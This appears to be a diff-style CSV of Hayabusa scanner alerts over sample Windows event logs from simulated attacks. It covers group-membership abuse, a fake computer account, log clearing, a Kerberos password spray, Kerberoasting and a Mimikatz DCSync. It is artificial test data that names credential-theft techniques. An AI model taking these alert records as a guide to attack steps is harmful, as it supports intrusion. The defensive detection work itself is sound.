+2020-07-12 14:19:54.572 +09:00,rootdc1.offsec.lan,4728,medium,User added to global security group,"Member added: CN=hack-adm-hack,OU=Test-OU,OU=OFFSEC-COMPANY,DC=offsec,DC=lan  :  SID: S-1-5-21-4230534742-2542757381-3142984815-1150  :  Group: Group06  :  Subject user: lambda-user  :  Subject domain: OFFSEC",rules/hayabusa/default/alerts/Security/4728_AccountManipulation_UserAddedToGlobalSecurityGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx
+2020-07-12 14:19:54.574 +09:00,rootdc1.offsec.lan,4728,low,User added to local security group,"User: CN=hack-adm-hack,OU=Test-OU,OU=OFFSEC-COMPANY,DC=offsec,DC=lan  :  SID: S-1-5-21-4230534742-2542757381-3142984815-1150  :  Group: Group07",rules/hayabusa/default/alerts/Security/4732-AccountManipulation_UserAddedToLocalSecurityGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx
+2020-07-12 14:19:54.574 +09:00,rootdc1.offsec.lan,4728,medium,User added to global security group,"Member added: CN=hack-adm-hack,OU=Test-OU,OU=OFFSEC-COMPANY,DC=offsec,DC=lan  :  SID: S-1-5-21-4230534742-2542757381-3142984815-1150  :  Group: Group07  :  Subject user: lambda-user  :  Subject domain: OFFSEC",rules/hayabusa/default/alerts/Security/4728_AccountManipulation_UserAddedToGlobalSecurityGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx
+2020-07-12 14:19:54.576 +09:00,rootdc1.offsec.lan,4728,low,User added to local security group,"User: CN=hack-adm-hack,OU=Test-OU,OU=OFFSEC-COMPANY,DC=offsec,DC=lan  :  SID: S-1-5-21-4230534742-2542757381-3142984815-1150  :  Group: Group08",rules/hayabusa/default/alerts/Security/4732-AccountManipulation_UserAddedToLocalSecurityGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx
+2020-07-12 14:19:54.576 +09:00,rootdc1.offsec.lan,4728,medium,User added to global security group,"Member added: CN=hack-adm-hack,OU=Test-OU,OU=OFFSEC-COMPANY,DC=offsec,DC=lan  :  SID: S-1-5-21-4230534742-2542757381-3142984815-1150  :  Group: Group08  :  Subject user: lambda-user  :  Subject domain: OFFSEC",rules/hayabusa/default/alerts/Security/4728_AccountManipulation_UserAddedToGlobalSecurityGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx
+2020-07-12 14:19:54.578 +09:00,rootdc1.offsec.lan,4728,low,User added to local security group,"User: CN=hack-adm-hack,OU=Test-OU,OU=OFFSEC-COMPANY,DC=offsec,DC=lan  :  SID: S-1-5-21-4230534742-2542757381-3142984815-1150  :  Group: Group09",rules/hayabusa/default/alerts/Security/4732-AccountManipulation_UserAddedToLocalSecurityGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx
+2020-07-12 14:19:54.578 +09:00,rootdc1.offsec.lan,4728,medium,User added to global security group,"Member added: CN=hack-adm-hack,OU=Test-OU,OU=OFFSEC-COMPANY,DC=offsec,DC=lan  :  SID: S-1-5-21-4230534742-2542757381-3142984815-1150  :  Group: Group09  :  Subject user: lambda-user  :  Subject domain: OFFSEC",rules/hayabusa/default/alerts/Security/4728_AccountManipulation_UserAddedToGlobalSecurityGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx
+2020-07-12 14:19:54.580 +09:00,rootdc1.offsec.lan,4728,low,User added to local security group,"User: CN=hack-adm-hack,OU=Test-OU,OU=OFFSEC-COMPANY,DC=offsec,DC=lan  :  SID: S-1-5-21-4230534742-2542757381-3142984815-1150  :  Group: Group10",rules/hayabusa/default/alerts/Security/4732-AccountManipulation_UserAddedToLocalSecurityGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx
+2020-07-12 14:19:54.580 +09:00,rootdc1.offsec.lan,4728,medium,User added to global security group,"Member added: CN=hack-adm-hack,OU=Test-OU,OU=OFFSEC-COMPANY,DC=offsec,DC=lan  :  SID: S-1-5-21-4230534742-2542757381-3142984815-1150  :  Group: Group10  :  Subject user: lambda-user  :  Subject domain: OFFSEC",rules/hayabusa/default/alerts/Security/4728_AccountManipulation_UserAddedToGlobalSecurityGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx
+2020-07-12 14:19:54.582 +09:00,rootdc1.offsec.lan,4728,low,User added to local security group,"User: CN=hack-adm-hack,OU=Test-OU,OU=OFFSEC-COMPANY,DC=offsec,DC=lan  :  SID: S-1-5-21-4230534742-2542757381-3142984815-1150  :  Group: Group11",rules/hayabusa/default/alerts/Security/4732-AccountManipulation_UserAddedToLocalSecurityGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx
+2020-07-12 14:19:54.582 +09:00,rootdc1.offsec.lan,4728,medium,User added to global security group,"Member added: CN=hack-adm-hack,OU=Test-OU,OU=OFFSEC-COMPANY,DC=offsec,DC=lan  :  SID: S-1-5-21-4230534742-2542757381-3142984815-1150  :  Group: Group11  :  Subject user: lambda-user  :  Subject domain: OFFSEC",rules/hayabusa/default/alerts/Security/4728_AccountManipulation_UserAddedToGlobalSecurityGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx
+2020-07-12 14:27:05.579 +09:00,fs02.offsec.lan,4825,medium,Denied Access To Remote Desktop,,rules/sigma/builtin/security/win_not_allowed_rdp_access.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.001-Remote Desktop Protocol/ID4825-Denied RDP connection with valid credentials.evtx
+2020-07-12 14:28:26.831 +09:00,fs02.offsec.lan,4825,medium,Denied Access To Remote Desktop,,rules/sigma/builtin/security/win_not_allowed_rdp_access.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.001-Remote Desktop Protocol/ID4825-Denied RDP connection with valid credentials.evtx
+2020-07-12 15:01:13.758 +09:00,rootdc1.offsec.lan,4728,high,User added to local Domain Admins group,"User: CN=honey-pot1,OU=Test-OU,OU=OFFSEC-COMPANY,DC=offsec,DC=lan  :  SID: S-1-5-21-4230534742-2542757381-3142984815-1159  :  Group: Domain Admins",rules/hayabusa/default/alerts/Security/4732-AccountManipulation_UserAddedToLocalDomainAdminsGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-4756-Member added to sensitive domain groups.evtx
+2020-07-12 15:01:13.758 +09:00,rootdc1.offsec.lan,4728,high,User added to the global Domain Admins group,"Member added: CN=honey-pot1,OU=Test-OU,OU=OFFSEC-COMPANY,DC=offsec,DC=lan  :  SID: S-1-5-21-4230534742-2542757381-3142984815-1159  :  Group: Domain Admins  :  Subject user: lambda-user  :  Subject domain: OFFSEC",rules/hayabusa/default/alerts/Security/4728_AccountManipulation_UserAddedToGlobalDomainAdmins.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-4756-Member added to sensitive domain groups.evtx
+2020-07-12 15:01:13.758 +09:00,rootdc1.offsec.lan,4728,medium,User added to global security group,"Member added: CN=honey-pot1,OU=Test-OU,OU=OFFSEC-COMPANY,DC=offsec,DC=lan  :  SID: S-1-5-21-4230534742-2542757381-3142984815-1159  :  Group: Domain Admins  :  Subject user: lambda-user  :  Subject domain: OFFSEC",rules/hayabusa/default/alerts/Security/4728_AccountManipulation_UserAddedToGlobalSecurityGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-4756-Member added to sensitive domain groups.evtx
+2020-07-13 04:45:00.670 +09:00,rootdc1.offsec.lan,4720,high,Hidden user account created! (Possible Backdoor),User: FAKE-COMPUTER$  :  SID:S-1-5-21-4230534742-2542757381-3142984815-1168,rules/hayabusa/default/alerts/Security/4720_CreateAccount-LocalAccount_ComputerAccountCreated.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1136-Create account/ID4720-Fake computer account created.evtx
+2020-07-13 17:34:33.915 +09:00,rootdc1.offsec.lan,4794,high,Password Change on Directory Service Restore Mode (DSRM) Account,,rules/sigma/builtin/security/win_susp_dsrm_password_change.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4794-4688-DSRM password set with NTDSutil.evtx
+2020-07-19 22:06:52.199 +09:00,01566s-win16-ir.threebeesco.com,5145,critical,Protected Storage Service Access,,rules/sigma/builtin/security/win_protected_storage_service_access.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_protectedstorage_5145_rpc_masterkey.evtx
+2020-07-23 05:29:27.321 +09:00,01566s-win16-ir.threebeesco.com,1102,high,Security log was cleared,User: a-jbrown,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/kerberos_pwd_spray_4771.evtx
+2020-07-23 05:29:36.414 +09:00,01566s-win16-ir.threebeesco.com,4768,informational,Kerberos TGT was requested,User: HD01  :  Service: krbtgt/THREEBEESCO.COM  :  IP Address: 172.16.66.1  :  Status: 0x6  :  PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/kerberos_pwd_spray_4771.evtx
+2020-07-23 05:29:36.414 +09:00,01566s-win16-ir.threebeesco.com,4768,informational,Kerberos TGT was requested,User: admin  :  Service: krbtgt/THREEBEESCO.COM  :  IP Address: 172.16.66.1  :  Status: 0x6  :  PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/kerberos_pwd_spray_4771.evtx
+2020-07-23 05:29:36.414 +09:00,01566s-win16-ir.threebeesco.com,4768,informational,Kerberos TGT was requested,User: svc-02  :  Service: krbtgt/THREEBEESCO.COM  :  IP Address: 172.16.66.1  :  Status: 0x6  :  PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/kerberos_pwd_spray_4771.evtx
+2020-07-23 05:29:36.414 +09:00,01566s-win16-ir.threebeesco.com,4768,informational,Kerberos TGT was requested,User: HD02  :  Service: krbtgt/THREEBEESCO.COM  :  IP Address: 172.16.66.1  :  Status: 0x6  :  PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/kerberos_pwd_spray_4771.evtx
+2020-07-23 05:29:36.414 +09:00,01566s-win16-ir.threebeesco.com,4768,informational,Kerberos TGT was requested,User: svc-01  :  Service: krbtgt/THREEBEESCO.COM  :  IP Address: 172.16.66.1  :  Status: 0x6  :  PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/kerberos_pwd_spray_4771.evtx
+2020-07-23 05:29:36.415 +09:00,01566s-win16-ir.threebeesco.com,4768,informational,Kerberos TGT was requested,User: bob  :  Service: krbtgt/THREEBEESCO.COM  :  IP Address: 172.16.66.1  :  Status: 0x6  :  PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/kerberos_pwd_spray_4771.evtx
+2020-07-23 05:29:36.415 +09:00,01566s-win16-ir.threebeesco.com,4768,informational,Kerberos TGT was requested,User: admin02  :  Service: krbtgt/THREEBEESCO.COM  :  IP Address: 172.16.66.1  :  Status: 0x6  :  PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/kerberos_pwd_spray_4771.evtx
+2020-07-23 05:29:36.434 +09:00,01566s-win16-ir.threebeesco.com,4768,informational,Kerberos TGT was requested,User: normal  :  Service: krbtgt  :  IP Address: 172.16.66.1  :  Status: 0x0  :  PreAuthType: 2,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/kerberos_pwd_spray_4771.evtx
+2020-07-23 05:29:36.437 +09:00,01566s-win16-ir.threebeesco.com,4768,informational,Kerberos TGT was requested,User: normal  :  Service: krbtgt  :  IP Address: ::ffff:172.16.66.1  :  Status: 0x0  :  PreAuthType: 2,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/kerberos_pwd_spray_4771.evtx
+2020-07-27 07:26:14.523 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: cmd  :  Path: C:\Windows\System32\cmd.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: winlogon.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/CVE-2020-0796_SMBV3Ghost_LocalPrivEsc_Sysmon_3_1_10.evtx
+2020-07-27 07:26:14.523 +09:00,MSEDGEWIN10,1,high,Abused Debug Privilege by Arbitrary Parent Processes,,rules/sigma/process_creation/sysmon_abusing_debug_privilege.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/CVE-2020-0796_SMBV3Ghost_LocalPrivEsc_Sysmon_3_1_10.evtx
+2020-07-27 07:26:15.141 +09:00,MSEDGEWIN10,3,low,PowerShell Network Connections,,rules/sigma/network_connection/sysmon_powershell_network_connection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/CVE-2020-0796_SMBV3Ghost_LocalPrivEsc_Sysmon_3_1_10.evtx
+2020-08-02 20:21:46.062 +09:00,rootdc1.offsec.lan,4662,medium,AD User Enumeration,,rules/sigma/builtin/security/win_ad_user_enumeration.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID4662-Sensitve DPAPI attributes accessed.evtx
+2020-08-02 20:21:46.068 +09:00,rootdc1.offsec.lan,4662,medium,AD User Enumeration,,rules/sigma/builtin/security/win_ad_user_enumeration.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID4662-Sensitve DPAPI attributes accessed.evtx
+2020-08-02 20:21:46.078 +09:00,rootdc1.offsec.lan,4662,medium,AD User Enumeration,,rules/sigma/builtin/security/win_ad_user_enumeration.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID4662-Sensitve DPAPI attributes accessed.evtx
+2020-08-02 20:21:46.083 +09:00,rootdc1.offsec.lan,4662,medium,AD User Enumeration,,rules/sigma/builtin/security/win_ad_user_enumeration.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID4662-Sensitve DPAPI attributes accessed.evtx
+2020-08-02 20:21:46.088 +09:00,rootdc1.offsec.lan,4662,medium,AD User Enumeration,,rules/sigma/builtin/security/win_ad_user_enumeration.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID4662-Sensitve DPAPI attributes accessed.evtx
+2020-08-02 20:21:46.094 +09:00,rootdc1.offsec.lan,4662,medium,AD User Enumeration,,rules/sigma/builtin/security/win_ad_user_enumeration.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID4662-Sensitve DPAPI attributes accessed.evtx
+2020-08-02 20:21:46.100 +09:00,rootdc1.offsec.lan,4662,medium,AD User Enumeration,,rules/sigma/builtin/security/win_ad_user_enumeration.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID4662-Sensitve DPAPI attributes accessed.evtx
+2020-08-02 20:21:46.110 +09:00,rootdc1.offsec.lan,4662,medium,AD User Enumeration,,rules/sigma/builtin/security/win_ad_user_enumeration.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID4662-Sensitve DPAPI attributes accessed.evtx
+2020-08-02 20:21:46.117 +09:00,rootdc1.offsec.lan,4662,medium,AD User Enumeration,,rules/sigma/builtin/security/win_ad_user_enumeration.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID4662-Sensitve DPAPI attributes accessed.evtx
+2020-08-02 20:21:46.153 +09:00,rootdc1.offsec.lan,4662,medium,AD User Enumeration,,rules/sigma/builtin/security/win_ad_user_enumeration.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID4662-Sensitve DPAPI attributes accessed.evtx
+2020-08-02 20:21:46.166 +09:00,rootdc1.offsec.lan,4662,medium,AD User Enumeration,,rules/sigma/builtin/security/win_ad_user_enumeration.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID4662-Sensitve DPAPI attributes accessed.evtx
+2020-08-02 20:21:46.181 +09:00,rootdc1.offsec.lan,4662,medium,AD User Enumeration,,rules/sigma/builtin/security/win_ad_user_enumeration.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID4662-Sensitve DPAPI attributes accessed.evtx
+2020-08-02 20:21:46.181 +09:00,rootdc1.offsec.lan,4662,medium,AD User Enumeration,,rules/sigma/builtin/security/win_ad_user_enumeration.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID4662-Sensitve DPAPI attributes accessed.evtx
+2020-08-02 20:33:06.521 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User:   :  Service:   :  IP Address: ::ffff:10.23.23.9  :  Status: 0x25,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Kerberoast ticket with low encryption.evtx
+2020-08-02 20:33:06.523 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN  :  Service: Svc-SQL-DB01  :  IP Address: ::ffff:10.23.23.9  :  Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Kerberoast ticket with low encryption.evtx
+2020-08-02 20:33:06.523 +09:00,rootdc1.offsec.lan,4769,medium,Suspicious Kerberos RC4 Ticket Encryption,,rules/sigma/builtin/security/win_susp_rc4_kerberos.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Kerberoast ticket with low encryption.evtx
+2020-08-02 20:37:11.847 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: ROOTDC1$@OFFSEC.LAN  :  Service: ROOTDC1$  :  IP Address: ::1  :  Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Kerberoast ticket with low encryption.evtx
+2020-08-02 20:37:12.567 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: ROOTDC1$@OFFSEC.LAN  :  Service: ROOTDC1$  :  IP Address: ::1  :  Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Kerberoast ticket with low encryption.evtx
+2020-08-02 20:37:54.898 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: WEC01$@OFFSEC.LAN  :  Service: ROOTDC1$  :  IP Address: ::ffff:10.23.42.22  :  Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Kerberoast ticket with low encryption.evtx
+2020-08-02 20:37:54.999 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: WEC01$@OFFSEC.LAN  :  Service: WEC01$  :  IP Address: ::ffff:10.23.42.22  :  Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Kerberoast ticket with low encryption.evtx
+2020-08-02 20:37:55.142 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: WEC01$@OFFSEC.LAN  :  Service: ROOTDC2$  :  IP Address: ::ffff:10.23.42.22  :  Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Kerberoast ticket with low encryption.evtx
+2020-08-02 20:37:55.483 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: WEC01$@OFFSEC.LAN  :  Service: ROOTDC1$  :  IP Address: ::ffff:10.23.42.22  :  Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Kerberoast ticket with low encryption.evtx
+2020-08-02 20:37:55.484 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: WEC01$@OFFSEC.LAN  :  Service: krbtgt  :  IP Address: ::ffff:10.23.42.22  :  Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Kerberoast ticket with low encryption.evtx
+2020-08-02 20:37:55.625 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: WEC01$@OFFSEC.LAN  :  Service: ROOTDC1$  :  IP Address: ::ffff:10.23.42.22  :  Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Kerberoast ticket with low encryption.evtx
+2020-08-02 21:02:34.103 +09:00,rootdc1.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig  :  Workstation: -  :  IP Address: 10.23.23.9  :  Port: 55731  :  LogonID: 0x11b8c41e,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4662-DCsync attack using Mimikatz.evtx
+2020-08-02 21:02:35.117 +09:00,rootdc1.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig  :  Workstation: -  :  IP Address: 10.23.23.9  :  Port: 55731  :  LogonID: 0x11b8c703,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4662-DCsync attack using Mimikatz.evtx
+2020-08-02 21:02:37.166 +09:00,rootdc1.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig  :  Workstation: -  :  IP Address: 10.23.23.9  :  Port: 55733  :  LogonID: 0x11b8c741,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4662-DCsync attack using Mimikatz.evtx
+2020-08-02 21:03:03.560 +09:00,rootdc1.offsec.lan,4624,informational,Logon Type 3 - Network,User: ROOTDC1$  :  Workstation: -  :  IP Address: fe80::1cae:5aa4:9d8d:106a  :  Port: 58736  :  LogonID: 0x11b8cd00,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4662-DCsync attack using Mimikatz.evtx
+2020-08-02 21:03:08.715 +09:00,rootdc1.offsec.lan,4624,informational,Logon Type 3 - Network,User: FS02$  :  Workstation: -  :  IP Address: 10.23.42.18  :  Port: 62274  :  LogonID: 0x11b8d014,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4662-DCsync attack using Mimikatz.evtx
+2020-08-02 21:03:12.993 +09:00,rootdc1.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig  :  Workstation: -  :  IP Address: 10.23.23.9  :  Port: 55738  :  LogonID: 0x11b8d057,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4662-DCsync attack using Mimikatz.evtx
+2020-08-02 21:04:02.850 +09:00,rootdc1.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig  :  Workstation: -  :  IP Address: 10.23.23.9  :  Port: 55748  :  LogonID: 0x11b8dcc1,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4662-DCsync attack using Mimikatz.evtx
+2020-08-02 21:04:09.689 +09:00,rootdc1.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig  :  Workstation: -  :  IP Address: 10.23.23.9  :  Port: 54927  :  LogonID: 0x11b9e9a8,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4662-DCsync attack using Mimikatz.evtx
+2020-08-02 21:04:09.695 +09:00,rootdc1.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig  :  Workstation: -  :  IP Address: 10.23.23.9  :  Port: 54931  :  LogonID: 0x11b9e9c0,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4662-DCsync attack using Mimikatz.evtx
+2020-08-02 21:04:09.696 +09:00,rootdc1.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig  :  Workstation: -  :  IP Address: 10.23.23.9  :  Port: 54933  :  LogonID: 0x11b9e9d3,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4662-DCsync attack using Mimikatz.evtx
+2020-08-02 21:04:09.696 +09:00,rootdc1.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig  :  Workstation: -  :  IP Address: 10.23.23.9  :  Port: 54932  :  LogonID: 0x11b9e9e5,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4662-DCsync attack using Mimikatz.evtx
+2020-08-02 21:04:09.816 +09:00,rootdc1.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig  :  Workstation: -  :  IP Address: 10.23.23.9  :  Port: 55750  :  LogonID: 0x11b9ea1f,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4662-DCsync attack using Mimikatz.evtx
